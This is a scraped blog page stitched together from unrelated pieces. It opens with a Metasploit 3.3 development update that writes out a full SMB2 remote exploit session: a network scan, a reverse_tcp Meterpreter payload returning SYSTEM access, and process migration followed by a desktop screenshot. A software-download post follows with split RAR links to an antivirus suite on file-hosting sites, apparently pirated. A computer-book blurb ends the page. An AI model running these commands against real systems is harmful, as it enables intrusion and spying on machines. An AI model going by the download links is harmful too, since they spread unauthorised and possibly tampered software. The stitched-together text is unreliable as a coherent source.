The last 48 hours has been a whirlwind of development at the Metasploit Project as we prepare for the 3.3 stable release. Efrain Torres completed the screenshot feature of the espia Metepreter module. This command only works when the process meterpreter is executing inside has access to the active desktop (like explorer.exe). You can see an example of this below:
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
204 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
[ snipped ]
1736 Explorer.EXE C:\WINDOWS\Explorer.EXE
3348 sol.exe C:\WINDOWS\system32\sol.exe
meterpreter > migrate 1736
[*] Migrating to 1736...
[*] Migration completed successfully.
meterpreter > screenshot /tmp/boom.bmp
[*] Image saved to /tmp/boom.bmp
Opening browser to image.
This morning Stephen Fewer released his long-awaited SMB2 code execution module for the Metasploit Framework. He plans to publish a whitepaper in the near future that discusses the exploit technique and the newly written Vista/2008 ring0 to ring3 stager code. This module is available in the 3.3-dev tree and supports Vista SP1/SP2 and 2008 SP1/SP2 (but not R2) with the same offsets and addresses. Keep in mind that the best workaround for this still-unpatched flaw is to disable the SMB2 protocol. The auxiliary module "auxiliary/scanner/smb/smb2" can be used to scan the network for systems that still have SMB2 enabled (shown below):
msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run
[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours
When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.
Now that we have identified two systems with SMB2 enabled, its exploit time!
msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Voila! A great way to justify disabling SMB2 across your network.
Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.
For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:
C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev
We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.
G Data Total Care 2010 | 255 Mb
Maximum security from the record test winner:
* Constant optimum virus detection
* For many years the quickest response time to new viruses
* The latest methods for detecting unknown viruses (behaviour blocking, heuristics, cloud security)
Simple user guidance - ideal for beginners:
* With new “one click” user interfaces - everything at a glance
* Automatically carries out all protection functions undetected in the background
* Silent firewall without annoying querying
The features of the new version at a glance:
- New GUI
- Performance Improvement
o 2.0 Fingerprinting
o Scanserver
o White Listing
- Optimized memory management
- False Positive Protection
~~Download
Uploading
http://uploading.com/files/7m7eeeff/GData_Total_Care_2010.part1.rar
http://uploading.com/files/177b86b4/GData_Total_Care_2010.part2.rar
http://uploading.com/files/22fb9e49/GData_Total_Care_2010.part3.rar
Hotfile
http://hotfile.com/dl/13614822/21dadad/GData_Total_Care_2010.part1.rar.html
http://hotfile.com/dl/13614823/34e1bb5/GData_Total_Care_2010.part2.rar.html
http://hotfile.com/dl/13614900/197051a/GData_Total_Care_2010.part3.rar.html
Depositfiles
http://depositfiles.com/files/3gbv64mpr
http://depositfiles.com/files/0kfs3efmj
http://depositfiles.com/files/8b9qzsawy
LINKS ARE INTERCHANGABLE. IT MEANS YOU CAN DOWNLOAD ANY PART FROM ANY SERVER AND LATER EXTRACT IT. NO PROBLEM AT ALL.
Hacking Movable Type (ExtremeTech)
Hacking Movable Type (ExtremeTech)
Product Description
Ready to push Movable Type to the max?
Movable Type, that amazingly powerful personal publishing application, is the superhero of the Internet age. But when you push, poke, stretch, and otherwise coax it into producing even more, the possibilities for your Web content are simply superlative. Roll up your sleeves and get moving-here’s the first book to tell you how.
Discover how to do all this and more
* Hack the perfect installation
* Hack the database
* Play with Atom, Perl, and XML-RPC APIs
* Write advanced plug-ins
* Master dynamic publishing
* Hack a super-powered blog app
* Ban comment spam
~~Download
![[2a6jvpg.jpg.gif]](http://4.bp.blogspot.com/_Tcczler2cto/Sx-7-1KvG-I/AAAAAAAAAYE/lAtvUFsRubc/s1600/2a6jvpg.jpg.gif)
![[Specialsecurity.gif]](http://3.bp.blogspot.com/_Tcczler2cto/Sx-4HoSjo4I/AAAAAAAAAXk/s7ybhAIDwKg/s1600/Specialsecurity.gif)
